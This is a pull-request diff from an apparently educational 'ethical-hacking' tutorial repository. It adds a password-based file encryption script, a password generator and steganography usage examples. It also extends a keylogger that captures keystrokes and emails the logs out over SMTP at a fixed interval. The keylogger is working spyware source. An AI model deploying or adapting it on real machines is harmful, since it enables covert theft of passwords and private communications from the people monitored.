[pull] master from x4nth055:master

ethical-hacking/file-encryption/crypt_password.py

@@ -0,0 +1,124 @@
+import cryptography
+from cryptography.fernet import Fernet
+from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
+
+import secrets
+import base64
+import getpass
+
+
+def generate_salt(size=16):
+ """Generate the salt used for key derivation, 
+ `size` is the length of the salt to generate"""
+ return secrets.token_bytes(size)
+
+
+def derive_key(salt, password):
+ """Derive the key from the `password` using the passed `salt`"""
+ kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1)
+ return kdf.derive(password.encode())
+
+
+def load_salt():
+ # load salt from salt.salt file
+ return open("salt.salt", "rb").read()
+
+
+def generate_key(password, salt_size=16, load_existing_salt=False, save_salt=True):
+ """
+ Generates a key from a `password` and the salt.
+ If `load_existing_salt` is True, it'll load the salt from a file
+ in the current directory called "salt.salt".
+ If `save_salt` is True, then it will generate a new salt
+ and save it to "salt.salt"
+ """
+ if load_existing_salt:
+ # load existing salt
+ salt = load_salt()
+ elif save_salt:
+ # generate new salt and save it
+ salt = generate_salt(salt_size)
+ with open("salt.salt", "wb") as salt_file:
+ salt_file.write(salt)
+ # generate the key from the salt and the password
+ derived_key = derive_key(salt, password)
+ # encode it using Base 64 and return it
+ return base64.urlsafe_b64encode(derived_key)
+
+
+def encrypt(filename, key):
+ """
+ Given a filename (str) and key (bytes), it encrypts the file and write it
+ """
+ f = Fernet(key)
+ with open(filename, "rb") as file:
+ # read all file data
+ file_data = file.read()
+ # encrypt data
+ encrypted_data = f.encrypt(file_data)
+ # write the encrypted file
+ with open(filename, "wb") as file:
+ file.write(encrypted_data)
+
+
+def decrypt(filename, key):
+ """
+ Given a filename (str) and key (bytes), it decrypts the file and write it
+ """
+ f = Fernet(key)
+ with open(filename, "rb") as file:
+ # read the encrypted data
+ encrypted_data = file.read()
+ # decrypt data
+ try:
+ decrypted_data = f.decrypt(encrypted_data)
+ except cryptography.fernet.InvalidToken:
+ print("Invalid token, most likely the password is incorrect")
+ return
+ # write the original file
+ with open(filename, "wb") as file:
+ file.write(decrypted_data)
+ print("File decrypted successfully")
+
+
+if __name__ == "__main__":
+ import argparse
+ parser = argparse.ArgumentParser(description="File Encryptor Script with a Password")
+ parser.add_argument("file", help="File to encrypt/decrypt")
+ parser.add_argument("-s", "--salt-size", help="If this is set, a new salt with the passed size is generated",
+ type=int)
+ parser.add_argument("-e", "--encrypt", action="store_true",
+ help="Whether to encrypt the file, only -e or -d can be specified.")
+ parser.add_argument("-d", "--decrypt", action="store_true",
+ help="Whether to decrypt the file, only -e or -d can be specified.")
+
+ args = parser.parse_args()
+ file = args.file
+
+ if args.encrypt:
+ password = getpass.getpass("Enter the password for encryption: ")
+ elif args.decrypt:
+ password = getpass.getpass("Enter the password you used for encryption: ")
+
+ if args.salt_size:
+ key = generate_key(password, salt_size=args.salt_size, save_salt=True)
+ else:
+ key = generate_key(password, load_existing_salt=True)
+
+ encrypt_ = args.encrypt
+ decrypt_ = args.decrypt
+
+ if encrypt_ and decrypt_:
+ raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
+ elif encrypt_:
+ encrypt(file, key)
+ elif decrypt_:
+ decrypt(file, key)
+ else:
+ raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
+
+
+
+
+
+

ethical-hacking/keylogger/keylogger.py

@@ -3,10 +3,12 @@
 # Timer is to make a method runs after an `interval` amount of time
 from threading import Timer
 from datetime import datetime
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
 
 SEND_REPORT_EVERY = 60 # in seconds, 60 means 1 minute and so on
-EMAIL_ADDRESS = "[email protected]"
-EMAIL_PASSWORD = "put_real_pw"
+EMAIL_ADDRESS = "[email protected]"
+EMAIL_PASSWORD = "password_here"
 
 class Keylogger:
  def __init__(self, interval, report_method="email"):
@@ -59,17 +61,37 @@ def report_to_file(self):
  print(self.log, file=f)
  print(f"[+] Saved{self.filename}.txt")
 
- def sendmail(self, email, password, message):
+ def prepare_mail(self, message):
+ """Utility function to construct a MIMEMultipart from a text
+ It creates an HTML version as well as text version
+ to be sent as an email"""
+ msg = MIMEMultipart("alternative")
+ msg["From"] = EMAIL_ADDRESS
+ msg["To"] = EMAIL_ADDRESS
+ msg["Subject"] = "Keylogger logs"
+ # simple paragraph, feel free to edit
+ html = f"<p>{message}</p>"
+ text_part = MIMEText(message, "plain")
+ html_part = MIMEText(html, "html")
+ msg.attach(text_part)
+ msg.attach(html_part)
+ # after making the mail, convert back as string message
+ return msg.as_string()
+
+ def sendmail(self, email, password, message, verbose=1):
  # manages a connection to an SMTP server
- server = smtplib.SMTP(host="smtp.gmail.com", port=587)
+ # in our case it's for Microsoft365, Outlook, Hotmail, and live.com
+ server = smtplib.SMTP(host="smtp.office365.com", port=587)
  # connect to the SMTP server as TLS mode ( for security )
  server.starttls()
  # login to the email account
  server.login(email, password)
- # send the actual message
- server.sendmail(email, email, message)
+ # send the actual message after preparation
+ server.sendmail(email, email, self.prepare_mail(message))
  # terminates the session
  server.quit()
+ if verbose:
+ print(f"{datetime.now()} - Sent an email to{email} containing:{message}")
 
  def report(self):
  """
@@ -85,8 +107,8 @@ def report(self):
  self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
  elif self.report_method == "file":
  self.report_to_file()
- # if you want to print in the console, uncomment below line
-# print(f"[{self.filename}] -{self.log}")
+# if you don't want to print in the console, comment below line
+ print(f"[{self.filename}] -{self.log}")
  self.start_dt = datetime.now()
  self.log = ""
  timer = Timer(interval=self.interval, function=self.report)
@@ -102,6 +124,8 @@ def start(self):
  keyboard.on_release(callback=self.callback)
  # start reporting the keylogs
  self.report()
+ # make a simple message
+ print(f"{datetime.now()} - Started keylogger")
  # block the current thread, wait until CTRL+C is pressed
  keyboard.wait()
 

ethical-hacking/password-generator/README.md

@@ -0,0 +1 @@
+# [How to Make a Password Generator in Python](https://www.thepythoncode.com/article/make-a-password-generator-in-python)

ethical-hacking/password-generator/password_generator.py

@@ -0,0 +1,72 @@
+from argparse import ArgumentParser
+import secrets
+import random
+import string
+
+# Setting up the Argument Parser
+parser = ArgumentParser(
+ prog='Password Generator.',
+ description='Generate any number of passwords with this tool.'
+)
+
+# Adding the arguments to the parser
+parser.add_argument("-n", "--numbers", default=0, help="Number of digits in the PW", type=int)
+parser.add_argument("-l", "--lowercase", default=0, help="Number of lowercase chars in the PW", type=int)
+parser.add_argument("-u", "--uppercase", default=0, help="Number of uppercase chars in the PW", type=int)
+parser.add_argument("-s", "--special-chars", default=0, help="Number of special chars in the PW", type=int)
+
+# add total pw length argument
+parser.add_argument("-t", "--total-length", type=int, 
+ help="The total password length. If passed, it will ignore -n, -l, -u and -s, " \
+ "and generate completely random passwords with the specified length")
+
+# The amount is a number so we check it to be of type int.
+parser.add_argument("-a", "--amount", default=1, type=int)
+parser.add_argument("-o", "--output-file")
+
+# Parsing the command line arguments.
+args = parser.parse_args()
+
+# list of passwords
+passwords = []
+# Looping through the amount of passwords.
+for _ in range(args.amount):
+ if args.total_length:
+ # generate random password with the length
+ # of total_length based on all available characters
+ passwords.append("".join(
+ [secrets.choice(string.digits + string.ascii_letters + string.punctuation) \
+ for _ in range(args.total_length)]))
+ else:
+ password = []
+ # If / how many numbers the password should contain 
+ for _ in range(args.numbers):
+ password.append(secrets.choice(string.digits))
+
+ # If / how many uppercase characters the password should contain 
+ for _ in range(args.uppercase):
+ password.append(secrets.choice(string.ascii_uppercase))
+
+ # If / how many lowercase characters the password should contain 
+ for _ in range(args.lowercase):
+ password.append(secrets.choice(string.ascii_lowercase))
+
+ # If / how many special characters the password should contain 
+ for _ in range(args.special_chars):
+ password.append(secrets.choice(string.punctuation))
+
+ # Shuffle the list with all the possible letters, numbers and symbols.
+ random.shuffle(password)
+
+ # Get the letters of the string up to the length argument and then join them.
+ password = ''.join(password)
+
+ # append this password to the overall list of password.
+ passwords.append(password)
+
+# Store the password to a .txt file.
+if args.output_file:
+ with open(args.output_file, 'w') as f:
+ f.write('\n'.join(passwords))
+
+print('\n'.join(passwords))

ethical-hacking/steganography/README.md

@@ -39,3 +39,21 @@ To run this:
  [+] Decoding...
  [+] Decoded data: This is some secret data.
  ```
+
+- To encode the `foo.pdf` file into the `image.PNG` image, using `steganography_advanced.py` script:
+ ```
+ $ python steganography_advanced.py -e image.PNG -f foo.pdf -b 1
+ ```
+ **Output:**
+ ```
+ [*] Maximum bytes to encode: 125028
+ [*] Data size: 84158
+ [*] Encoding data...
+ [+] Saved encoded image.
+ ```
+- Now decoding it into a file `foo_decoded.pdf`:
+ ```
+ python steganography_advanced.py -d image_encoded.PNG -f foo_decoded.pdf -b 1
+ [+] Decoding...
+ [+] File decoded, foo_decoded.pdf is saved successfully.
+ ```